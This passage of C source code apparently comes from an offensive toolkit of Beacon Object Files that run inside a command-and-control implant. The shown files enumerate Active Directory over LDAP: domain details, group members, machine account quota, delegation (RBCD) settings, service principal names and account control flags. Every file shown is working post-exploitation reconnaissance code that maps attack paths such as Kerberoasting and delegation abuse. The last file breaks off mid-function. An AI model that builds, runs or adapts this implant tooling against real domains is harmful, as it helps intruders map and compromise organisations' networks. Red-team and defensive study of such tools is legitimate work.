        "domainFunctionality",
        "domainControllerFunctionality",
        "supportedLDAPVersion",
        "currentTime",
        "highestCommittedUSN",
        NULL
    };

    ULONG result = WLDAP32$ldap_search_s(
        ld,
        "",
        LDAP_SCOPE_BASE,
        "(objectClass=*)",
        attrs,
        0,
        &searchResult
    );

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to query rootDSE");
        PrintLdapError("Query rootDSE", result);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    LDAPMessage* entry = WLDAP32$ldap_first_entry(ld, searchResult);
    if (entry) {
        BeaconPrintf(CALLBACK_OUTPUT, "\n[+] Domain Information:");
        BeaconPrintf(CALLBACK_OUTPUT, "=======================");

        // Print each attribute
        for (int i = 0; attrs[i] != NULL; i++) {
            char** values = WLDAP32$ldap_get_values(ld, entry, attrs[i]);
            if (values && values[0]) {
                BeaconPrintf(CALLBACK_OUTPUT, "%-35s : %s", attrs[i], values[0]);
                WLDAP32$ldap_value_free(values);
            }
        }
    }

    WLDAP32$ldap_msgfree(searchResult);

    // Get default naming context for additional queries
    char* defaultNC = GetDefaultNamingContext(ld, dcHostname);
    if (defaultNC) {
        // Count users, computers, groups
        BeaconPrintf(CALLBACK_OUTPUT, "\n[+] Object Counts:");
        BeaconPrintf(CALLBACK_OUTPUT, "==================");

        // Count users
        LDAPMessage* countResult = NULL;
        result = WLDAP32$ldap_search_s(ld, defaultNC, LDAP_SCOPE_SUBTREE,
            "(&(objectClass=user)(objectCategory=person))", NULL, 1, &countResult);
        if (result == LDAP_SUCCESS) {
            int count = WLDAP32$ldap_count_entries(ld, countResult);
            BeaconPrintf(CALLBACK_OUTPUT, "%-35s : %d", "Users", count);
            WLDAP32$ldap_msgfree(countResult);
        }

        // Count computers
        result = WLDAP32$ldap_search_s(ld, defaultNC, LDAP_SCOPE_SUBTREE,
            "(objectClass=computer)", NULL, 1, &countResult);
        if (result == LDAP_SUCCESS) {
            int count = WLDAP32$ldap_count_entries(ld, countResult);
            BeaconPrintf(CALLBACK_OUTPUT, "%-35s : %d", "Computers", count);
            WLDAP32$ldap_msgfree(countResult);
        }

        // Count groups
        result = WLDAP32$ldap_search_s(ld, defaultNC, LDAP_SCOPE_SUBTREE,
            "(objectClass=group)", NULL, 1, &countResult);
        if (result == LDAP_SUCCESS) {
            int count = WLDAP32$ldap_count_entries(ld, countResult);
            BeaconPrintf(CALLBACK_OUTPUT, "%-35s : %d", "Groups", count);
            WLDAP32$ldap_msgfree(countResult);
        }

        // Count OUs
        result = WLDAP32$ldap_search_s(ld, defaultNC, LDAP_SCOPE_SUBTREE,
            "(objectClass=organizationalUnit)", NULL, 1, &countResult);
        if (result == LDAP_SUCCESS) {
            int count = WLDAP32$ldap_count_entries(ld, countResult);
            BeaconPrintf(CALLBACK_OUTPUT, "%-35s : %d", "Organizational Units", count);
            WLDAP32$ldap_msgfree(countResult);
        }

        MSVCRT$free(defaultNC);
    }

    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}


================================================
FILE: AD-BOF/LDAP-BOF/src/get/get-groupmembers.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments: group_identifier, is_dn, search_ou, dc_address
    char* groupIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isGroupDN = BeaconDataInt(&parser);
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));

    if (!groupIdentifier || MSVCRT$strlen(groupIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Group identifier is required");
        return;
    }

    // Initialize LDAP connection (always use regular LDAP for queries)
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, FALSE, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    // Get default naming context
    char* defaultNC = GetDefaultNamingContext(ld, dcHostname);
    if (!defaultNC) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    // Resolve group DN
    char* groupDN = NULL;
    if (isGroupDN) {
        size_t len = MSVCRT$strlen(groupIdentifier) + 1;
        groupDN = (char*)MSVCRT$malloc(len);
        if (groupDN) {
            MSVCRT$strcpy(groupDN, groupIdentifier);
        }
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        groupDN = FindObjectDN(ld, groupIdentifier, searchBase);
        if (!groupDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Group '%s' not found", groupIdentifier);
            MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Group DN: %s", groupDN);
    }

    // Query the group's member attribute
    LDAPMessage* searchResult = NULL;
    char* attrs[] = { "member", NULL };

    ULONG result = WLDAP32$ldap_search_s(
        ld,
        groupDN,
        LDAP_SCOPE_BASE,
        "(objectClass=*)",
        attrs,
        0,
        &searchResult
    );

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to query group members");
        PrintLdapError("Query member", result);
        MSVCRT$free(groupDN);
        MSVCRT$free(defaultNC);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    LDAPMessage* entry = WLDAP32$ldap_first_entry(ld, searchResult);
    if (entry) {
        char** memberValues = WLDAP32$ldap_get_values(ld, entry, "member");
        if (memberValues) {
            int memberCount = WLDAP32$ldap_count_values(memberValues);
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Group has %d member(s):\n", memberCount);
            BeaconPrintf(CALLBACK_OUTPUT, "Member DN");
            BeaconPrintf(CALLBACK_OUTPUT, "=========");
            for (int i = 0; memberValues[i] != NULL; i++) {
                BeaconPrintf(CALLBACK_OUTPUT, "%s", memberValues[i]);
            }
            WLDAP32$ldap_value_free(memberValues);
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "[*] Group has no members");
        }
    }

    WLDAP32$ldap_msgfree(searchResult);
    MSVCRT$free(groupDN);
    MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}


================================================
FILE: AD-BOF/LDAP-BOF/src/get/get-groups.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments: search_ou, dc_address, use_ldaps, attributes
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);
    char* attributesStr = ValidateInput(BeaconDataExtract(&parser, NULL));

    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    // Get default naming context
    char* defaultNC = GetDefaultNamingContext(ld, dcHostname);
    if (!defaultNC) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;

    // Build attribute list
    char* attrs[64];
    char* defaultAttrs[] = { "distinguishedName" };
    int attrCount = BuildAttributeList(attributesStr, defaultAttrs, 1, attrs, 64);

    // Check if ntSecurityDescriptor is requested (case-insensitive)
    BOOL needSDFlags = FALSE;
    for (int i = 0; i < attrCount; i++) {
        if (MSVCRT$_stricmp(attrs[i], "ntSecurityDescriptor") == 0) {
            needSDFlags = TRUE;
            break;
        }
    }

    // Search for group objects
    LDAPMessage* searchResult = NULL;
    ULONG result;

    if (needSDFlags) {
        // Create SD_FLAGS control for ntSecurityDescriptor
        DWORD sdFlags = OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION;

        char sdFlagsBuffer[10];
        struct berval sdFlagsValue;
        LDAPControlA* sdFlagsControl = BuildSDFlagsControl(sdFlags, sdFlagsBuffer, &sdFlagsValue);

        LDAPControlA* serverControls[] = { sdFlagsControl, NULL };

        result = WLDAP32$ldap_search_ext_s(
            ld,
            searchBase,
            LDAP_SCOPE_SUBTREE,
            "(objectClass=group)",
            attrs,
            0,
            serverControls,
            NULL,           // ClientControls
            NULL,           // timeout
            0,              // SizeLimit
            &searchResult
        );
    } else {
        result = WLDAP32$ldap_search_s(
            ld,
            searchBase,
            LDAP_SCOPE_SUBTREE,
            "(objectClass=group)",
            attrs,
            0,
            &searchResult
        );
    }

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to search for groups");
        PrintLdapError("Search groups", result);
        MSVCRT$free(defaultNC);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    int groupCount = WLDAP32$ldap_count_entries(ld, searchResult);
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Found %d group(s):\n", groupCount);

    LDAPMessage* entry = WLDAP32$ldap_first_entry(ld, searchResult);
    while (entry != NULL) {
        BeaconPrintf(CALLBACK_OUTPUT, "===================================");

        // Display all requested attributes
        for (int i = 0; i < attrCount; i++) {
            DisplayAttributeValue(ld, entry, attrs[i]);
        }

        entry = WLDAP32$ldap_next_entry(ld, entry);
    }

    WLDAP32$ldap_msgfree(searchResult);
    MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}

================================================
FILE: AD-BOF/LDAP-BOF/src/get/get-maq.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments: dc_address, use_ldaps
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);

    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    // Get default naming context
    char* defaultNC = GetDefaultNamingContext(ld, dcHostname);
    if (!defaultNC) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    // Query domain object for ms-DS-MachineAccountQuota attribute
    LDAPMessage* searchResult = NULL;
    char* attrs[] = { "ms-DS-MachineAccountQuota", NULL };

    ULONG result = WLDAP32$ldap_search_s(
        ld,
        defaultNC,
        LDAP_SCOPE_BASE,
        "(objectClass=*)",
        attrs,
        0,
        &searchResult
    );

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to query machine account quota");
        PrintLdapError("Query MAQ", result);
        MSVCRT$free(defaultNC);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    LDAPMessage* entry = WLDAP32$ldap_first_entry(ld, searchResult);
    if (entry) {
        char** maqValues = WLDAP32$ldap_get_values(ld, entry, "ms-DS-MachineAccountQuota");
        if (maqValues && maqValues[0]) {
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Machine Account Quota (ms-DS-MachineAccountQuota): %s", maqValues[0]);
            WLDAP32$ldap_value_free(maqValues);
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "[*] Machine Account Quota attribute not found or not set");
        }
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] No results returned");
    }

    WLDAP32$ldap_msgfree(searchResult);
    MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}


================================================
FILE: AD-BOF/LDAP-BOF/src/get/get-object.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments: object_identifier, is_dn, search_ou, dc_address, use_ldaps
    char* objectIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isObjectDN = BeaconDataInt(&parser);
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);

    if (!objectIdentifier || MSVCRT$strlen(objectIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Object identifier is required");
        return;
    }

    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    // Get default naming context
    char* defaultNC = GetDefaultNamingContext(ld, dcHostname);
    if (!defaultNC) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    // Resolve object DN
    char* objectDN = NULL;
    if (isObjectDN) {
        size_t len = MSVCRT$strlen(objectIdentifier) + 1;
        objectDN = (char*)MSVCRT$malloc(len);
        if (objectDN) {
            MSVCRT$strcpy(objectDN, objectIdentifier);
        }
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        objectDN = FindObjectDN(ld, objectIdentifier, searchBase);
        if (!objectDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Object '%s' not found", objectIdentifier);
            MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Query all attributes
    LDAPMessage* searchResult = NULL;
    char* attrs[] = { "*", NULL };

    ULONG result = WLDAP32$ldap_search_s(
        ld,
        objectDN,
        LDAP_SCOPE_BASE,
        "(objectClass=*)",
        attrs,
        0,
        &searchResult
    );

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to query object");
        PrintLdapError("Query object", result);
        MSVCRT$free(objectDN);
        MSVCRT$free(defaultNC);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    LDAPMessage* entry = WLDAP32$ldap_first_entry(ld, searchResult);
    if (entry) {
        BeaconPrintf(CALLBACK_OUTPUT, "\n[+] Object attributes:\n======================");

        // Iterate through all attributes
        BerElement* ber = NULL;
        char* attribute = WLDAP32$ldap_first_attribute(ld, entry, &ber);
        while (attribute != NULL) {
            // Check if this is a known binary attribute (case-insensitive)
            BOOL isBinary = (MSVCRT$_stricmp(attribute, "objectGUID") == 0 ||
                            MSVCRT$_stricmp(attribute, "objectSid") == 0 ||
                            MSVCRT$_stricmp(attribute, "objectSID") == 0);

            if (isBinary) {
                // Handle binary attributes
                struct berval** bvalues = WLDAP32$ldap_get_values_len(ld, entry, attribute);
                if (bvalues && bvalues[0]) {
                    char formatted[256];
                    if (MSVCRT$_stricmp(attribute, "objectGUID") == 0) {
                        FormatGUID((BYTE*)bvalues[0]->bv_val, formatted);
                        BeaconPrintf(CALLBACK_OUTPUT, "%-30s : %s", attribute, formatted);
                    } else if (MSVCRT$_stricmp(attribute, "objectSid") == 0 ||
                               MSVCRT$_stricmp(attribute, "objectSID") == 0) {
                        FormatSID((BYTE*)bvalues[0]->bv_val, bvalues[0]->bv_len, formatted);
                        BeaconPrintf(CALLBACK_OUTPUT, "%-30s : %s", attribute, formatted);
                    }
                }
                if (bvalues) WLDAP32$ldap_value_free_len(bvalues);
            } else {
                // Handle string attributes
                char** values = WLDAP32$ldap_get_values(ld, entry, attribute);
                if (values) {
                    for (int i = 0; values[i] != NULL; i++) {
                        BeaconPrintf(CALLBACK_OUTPUT, "%-30s : %s", attribute, values[i]);
                    }
                    WLDAP32$ldap_value_free(values);
                }
            }

            WLDAP32$ldap_memfree(attribute);
            attribute = WLDAP32$ldap_next_attribute(ld, entry, ber);
        }
        if (ber) WLDAP32$ber_free(ber, 0);
    }

    WLDAP32$ldap_msgfree(searchResult);
    MSVCRT$free(objectDN);
    MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}

================================================
FILE: AD-BOF/LDAP-BOF/src/get/get-rbcd.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"
#include "acl_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments: target_identifier, is_dn, search_ou, dc_address, use_ldaps
    char* targetIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTargetDN = BeaconDataInt(&parser);
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);

    if (!targetIdentifier || MSVCRT$strlen(targetIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target identifier is required");
        return;
    }

    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    // Get default naming context
    char* defaultNC = GetDefaultNamingContext(ld, dcHostname);
    if (!defaultNC) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    // Resolve target DN
    char* targetDN = NULL;
    if (isTargetDN) {
        size_t len = MSVCRT$strlen(targetIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) {
            MSVCRT$strcpy(targetDN, targetIdentifier);
        }
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, targetIdentifier, searchBase);
        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Target '%s' not found", targetIdentifier);
            MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Query msDS-AllowedToActOnBehalfOfOtherIdentity attribute
    LDAPMessage* searchResult = NULL;
    char* attrs[] = { "msDS-AllowedToActOnBehalfOfOtherIdentity", NULL };

    ULONG result = WLDAP32$ldap_search_s(
        ld,
        targetDN,
        LDAP_SCOPE_BASE,
        "(objectClass=*)",
        attrs,
        0,
        &searchResult
    );

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to query RBCD attribute");
        PrintLdapError("Query RBCD", result);
        MSVCRT$free(targetDN);
        MSVCRT$free(defaultNC);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    LDAPMessage* entry = WLDAP32$ldap_first_entry(ld, searchResult);
    if (entry) {
        struct berval** values = WLDAP32$ldap_get_values_len(ld, entry, "msDS-AllowedToActOnBehalfOfOtherIdentity");
        if (values && values[0]) {
            BeaconPrintf(CALLBACK_OUTPUT, "\n[+] RBCD Configuration Found:");
            BeaconPrintf(CALLBACK_OUTPUT, "==============================");
            BeaconPrintf(CALLBACK_OUTPUT, "[*] msDS-AllowedToActOnBehalfOfOtherIdentity is set (%d bytes)", values[0]->bv_len);

            // Parse the security descriptor stored in this attribute
            PSD_INFO sdInfo = ParseSecurityDescriptor((BYTE*)values[0]->bv_val, values[0]->bv_len);
            if (sdInfo) {
                BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Principals allowed to delegate:");
                if (sdInfo->DaclAces) {
                    for (DWORD i = 0; i < sdInfo->DaclAceCount; i++) {
                        PPARSED_ACE_INFO ace = &sdInfo->DaclAces[i];
                        if (ace->TrusteeSid) {
                            // Try to resolve the SID to a name
                            char* trusteeName = ResolveSidToName(ld, ace->TrusteeSid, defaultNC);
                            if (trusteeName) {
                                BeaconPrintf(CALLBACK_OUTPUT, "    [%d] %s (%s)", i, trusteeName, ace->TrusteeSid);
                                MSVCRT$free(trusteeName);
                            } else {
                                BeaconPrintf(CALLBACK_OUTPUT, "    [%d] %s", i, ace->TrusteeSid);
                            }
                        }
                    }
                }
                FreeSecurityDescriptorInfo(sdInfo);
            } else {
                BeaconPrintf(CALLBACK_OUTPUT, "[*] Could not parse RBCD security descriptor");
            }

            WLDAP32$ldap_value_free_len(values);
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "\n[*] No RBCD configuration found");
        }
    }

    WLDAP32$ldap_msgfree(searchResult);
    MSVCRT$free(targetDN);
    MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}


================================================
FILE: AD-BOF/LDAP-BOF/src/get/get-spn.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments: target_identifier, is_dn, search_ou, dc_address, use_ldaps
    char* targetIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTargetDN = BeaconDataInt(&parser);
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);

    if (!targetIdentifier || MSVCRT$strlen(targetIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target identifier is required");
        return;
    }

    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    // Get default naming context
    char* defaultNC = NULL;
    if (!isTargetDN) {
        defaultNC = GetDefaultNamingContext(ld, dcHostname);
        if (!defaultNC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Resolve target DN
    char* targetDN = NULL;
    if (isTargetDN) {
        size_t len = MSVCRT$strlen(targetIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) {
            MSVCRT$strcpy(targetDN, targetIdentifier);
        }
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, targetIdentifier, searchBase);
        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Target '%s' not found", targetIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Query servicePrincipalName attribute
    LDAPMessage* searchResult = NULL;
    char* attrs[] = { "servicePrincipalName", NULL };

    ULONG result = WLDAP32$ldap_search_s(
        ld,
        targetDN,
        LDAP_SCOPE_BASE,
        "(objectClass=*)",
        attrs,
        0,
        &searchResult
    );

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to query SPNs");
        PrintLdapError("Query SPN", result);
        MSVCRT$free(targetDN);
        if (defaultNC) MSVCRT$free(defaultNC);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    LDAPMessage* entry = WLDAP32$ldap_first_entry(ld, searchResult);
    if (entry) {
        char** values = WLDAP32$ldap_get_values(ld, entry, "servicePrincipalName");
        if (values) {
            int spnCount = WLDAP32$ldap_count_values(values);
            BeaconPrintf(CALLBACK_OUTPUT, "\n[+] Service Principal Names (%d):", spnCount);
            BeaconPrintf(CALLBACK_OUTPUT, "==================================");
            for (int i = 0; values[i] != NULL; i++) {
                BeaconPrintf(CALLBACK_OUTPUT, "%s", values[i]);
            }
            WLDAP32$ldap_value_free(values);
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "[*] No SPNs configured for this object");
        }
    }

    WLDAP32$ldap_msgfree(searchResult);
    MSVCRT$free(targetDN);
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}


================================================
FILE: AD-BOF/LDAP-BOF/src/get/get-uac.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

DECLSPEC_IMPORT long __cdecl MSVCRT$strtol(const char* str, char** endptr, int base);

// UAC flag name to value mapping
typedef struct {
    const char* name;
    DWORD value;
    const char* description;
} UAC_FLAG_MAP;

static const UAC_FLAG_MAP uacFlags[] = {
    {"SCRIPT", UF_SCRIPT, "Logon script executed"},
    {"ACCOUNTDISABLE", UF_ACCOUNTDISABLE, "Account disabled"},
    {"HOMEDIR_REQUIRED", UF_HOMEDIR_REQUIRED, "Home directory required"},
    {"LOCKOUT", UF_LOCKOUT, "Account locked out"},
    {"PASSWD_NOTREQD", UF_PASSWD_NOTREQD, "No password required"},
    {"PASSWD_CANT_CHANGE", UF_PASSWD_CANT_CHANGE, "User cannot change password"},
    {"ENCRYPTED_TEXT_PWD_ALLOWED", UF_ENCRYPTED_TEXT_PWD_ALLOWED, "Reversible encryption enabled"},
    {"TEMP_DUPLICATE_ACCOUNT", UF_TEMP_DUPLICATE_ACCOUNT, "Local user account"},
    {"NORMAL_ACCOUNT", UF_NORMAL_ACCOUNT, "Normal user account"},
    {"INTERDOMAIN_TRUST_ACCOUNT", UF_INTERDOMAIN_TRUST_ACCOUNT, "Interdomain trust account"},
    {"WORKSTATION_TRUST_ACCOUNT", UF_WORKSTATION_TRUST_ACCOUNT, "Computer account"},
    {"SERVER_TRUST_ACCOUNT", UF_SERVER_TRUST_ACCOUNT, "Domain controller account"},
    {"DONT_EXPIRE_PASSWD", UF_DONT_EXPIRE_PASSWD, "Password never expires"},
    {"MNS_LOGON_ACCOUNT", UF_MNS_LOGON_ACCOUNT, "MNS logon account"},
    {"SMARTCARD_REQUIRED", UF_SMARTCARD_REQUIRED, "Smart card required"},
    {"TRUSTED_FOR_DELEGATION", UF_TRUSTED_FOR_DELEGATION, "Trusted for delegation"},
    {"NOT_DELEGATED", UF_NOT_DELEGATED, "Cannot be delegated"},
    {"USE_DES_KEY_ONLY", UF_USE_DES_KEY_ONLY, "DES encryption only"},
    {"DONT_REQ_PREAUTH", UF_DONT_REQ_PREAUTH, "Pre-authentication not required"},
    {"PASSWORD_EXPIRED", UF_PASSWORD_EXPIRED, "Password expired"},
    {"TRUSTED_TO_AUTH_FOR_DELEGATION", UF_TRUSTED_TO_AUTH_FOR_DELEGATION, "Trusted for constrained delegation"},
    {"NO_AUTH_DATA_REQUIRED", UF_NO_AUTH_DATA_REQUIRED, "No Kerberos PAC required"},
    {"PARTIAL_SECRETS_ACCOUNT", UF_PARTIAL_SECRETS_ACCOUNT, "RODC partial secrets"},
    {NULL, 0, NULL}
};

void PrintUACFlags(DWORD uacValue) {
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Current UAC value: 0x%08X (%lu)", uacValue, uacValue);
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Active flags:");

    BOOL foundAny = FALSE;
    for (int i = 0; uacFlags[i].name != NULL; i++) {
        if (uacValue & uacFlags[i].value) {
            BeaconPrintf(CALLBACK_OUTPUT, "    %-35s (0x%08X) - %s",
                        uacFlags[i].name,
                        uacFlags[i].value,
                        uacFlags[i].description);
            foundAny = TRUE;
        }
    }

    if (!foundAny) {
        BeaconPrintf(CALLBACK_OUTPUT, "    (No flags set)");
    }
}

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments: target_identifier, is_dn, search_ou, dc_address, use_ldaps
    char* targetIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTargetDN = BeaconDataInt(&parser);
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);

    if (!targetIdentifier || MSVCRT$strlen(targetIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target identifier is required");
        return;
    }

    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    // Get default naming context
    char* defaultNC = NULL;
    if (!isTargetDN) {
        defaultNC = GetDefaultNamingContext(ld, dcHostname);
        if (!defaultNC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Resolve target DN
    char* targetDN = NULL;
    if (isTargetDN) {
        size_t len = MSVCRT$strlen(targetIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) {
            MSVCRT$strcpy(targetDN, targetIdentifier);
        }
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, targetIdentifier, searchBase);
        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Target '%s' not found", targetIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
